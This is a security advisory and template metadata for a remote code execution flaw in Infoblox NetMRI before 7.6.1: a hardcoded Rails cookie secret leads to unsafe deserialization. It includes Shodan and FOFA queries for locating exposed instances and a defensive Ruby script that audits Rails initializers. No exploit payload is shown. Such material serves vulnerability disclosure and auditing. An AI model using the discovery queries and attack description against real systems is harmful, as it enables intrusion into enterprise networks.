Vulnerability description: Infoblox NetMRI is a network management tool widely deployed in enterprise networks to automate network configuration, compliance checking and troubleshooting. It ships as a virtual appliance and forms an important part of enterprise network infrastructure. The vulnerability lies in NetMRI's Ruby on Rails component: because the session cookie secret key is hardcoded, an attacker can use it to achieve remote code execution. Specifically, the Rails web component deserializes the session cookie once the cookie's signature verifies against the signing key. An attacker who knows the hardcoded key can craft a malicious session cookie, and when the application deserializes it, arbitrary code is executed. This flaw is related to the known Ruby on Rails deserialization vulnerability (CVE-2013-0156). Infoblox did not assign a new CVE for this issue because it stems from the underlying Rails vulnerability. The impact is extremely severe: an attacker can take complete control of the system, potentially leading to data leakage, service disruption or other malicious activity. Because exploitation requires no authentication and can be automated, the risk is very high. Users are advised to upgrade immediately to Infoblox NetMRI 7.6.1 or later to fix this vulnerability.
Vendor: Infoblox
Product: NetMRI
Affected versions: version < 7.6.1
Search syntax: http.title:"netmri" OR http.favicon.hash:"-319724102" OR icon_hash="-319724102" OR "infoblox netmri"
info:
  name: Infoblox NetMRI < 7.6.1 - Remote Code Execution via Hardcoded Ruby Cookie Secret Key
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Infoblox NetMRI virtual appliances before version 7.6.1 are vulnerable to remote code execution (RCE) due to the use of a hardcoded Ruby on Rails session cookie secret key. The Rails web component deserializes session cookies if the signing key is valid. Attackers with knowledge of this key can craft malicious session cookies that are deserialized by the application, leading to arbitrary code execution. This vulnerability is related to the known Ruby on Rails deserialization flaw (CVE-2013-0156). Infoblox did not assign a new CVE for this issue, as it is a result of the underlying Rails vulnerability.
  impact: |
    An attacker can exploit this vulnerability to execute arbitrary commands on the NetMRI server, potentially leading to complete system compromise.
  remediation: |
    Upgrade Infoblox NetMRI to version 7.6.1 or later to mitigate this vulnerability.
  reference:
    - https://rhinosecuritylabs.com/research/infoblox-multiple-cves/
    - https://nvd.nist.gov/vuln/detail/CVE-2013-0156
  classification:
    cwe-id: CWE-502
  metadata:
    verified: true
    max-request: 1
    vendor: infoblox
    product: netmri
    shodan-query:
      - http.title:"netmri"
      - http.favicon.hash:"-319724102"
    fofa-query:
      - icon_hash="-319724102"
      - infoblox netmri
  tags: infoblox,netmri,rails,rce,deserialization,oast
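As an added example (not code from the advisory, the template or Infoblox), a Ruby audit script for the weakness the description explains: it flags a Rails initializer that assigns the session-cookie signing secret from a literal in the code, and a cookie serializer left on Marshal so that a validly signed cookie is deserialized into arbitrary objects. The regex patterns are assumptions about typical Rails 3/4 initializers, and the two sample initializers are constructed, not real NetMRI files.

```ruby
# Added example, not from the advisory or Infoblox: audit a Rails app's
# secret configuration for the weakness described above, a session-cookie
# signing secret shipped as a literal in the code, and for the Marshal
# cookie serializer that lets a validly signed cookie reach arbitrary
# object deserialization (the CVE-2013-0156 class). Pure Ruby stdlib.

# Assumed, typical Rails 3/4 initializer assignments of the signing secret.
SECRET_ASSIGN = /(secret_token|secret_key_base)\s*=\s*(.+)$/

# Return one finding string per line that assigns the secret from a literal
# or from anything other than the environment / credentials store.
def audit_secret_source(text)
  findings = []
  text.each_line do |line|
    next if line.strip.start_with?('#')       # skip comment lines
    m = SECRET_ASSIGN.match(line)
    next unless m
    name, value = m[1], m[2].strip
    if value.start_with?("'", '"')
      findings << "hardcoded #{name} literal: #{value[0, 10]}..."
    elsif value !~ /ENV|credentials|secrets/
      findings << "#{name} not taken from environment/credentials: #{value}"
    end
  end
  findings
end

# Rails 4.1+ exposes cookies_serializer; absent (older Rails) or :marshal
# means signed cookies are Marshal-loaded, so a valid signature alone gates
# deserialization of attacker-chosen objects.
def audit_cookie_serializer(text)
  return [] if text =~ /cookies_serializer\s*=\s*:json/
  ['cookies_serializer is not :json; signed session cookies are Marshal-loaded']
end

# Constructed sample initializers (not real NetMRI files, placeholder secret).
VULNERABLE_INITIALIZER = <<~RUBY
  # config/initializers/secret_token.rb
  SampleApp::Application.config.secret_token = 'e1c0ffee...placeholder...'
RUBY

HARDENED_INITIALIZER = <<~RUBY
  SampleApp::Application.config.secret_key_base = ENV.fetch('SECRET_KEY_BASE')
  SampleApp::Application.config.action_dispatch.cookies_serializer = :json
RUBY

# Run: audit_secret_source(text) + audit_cookie_serializer(text) on each file.
```

Running both audits over the vulnerable sample yields two findings (literal secret, Marshal serializer); the hardened sample yields none.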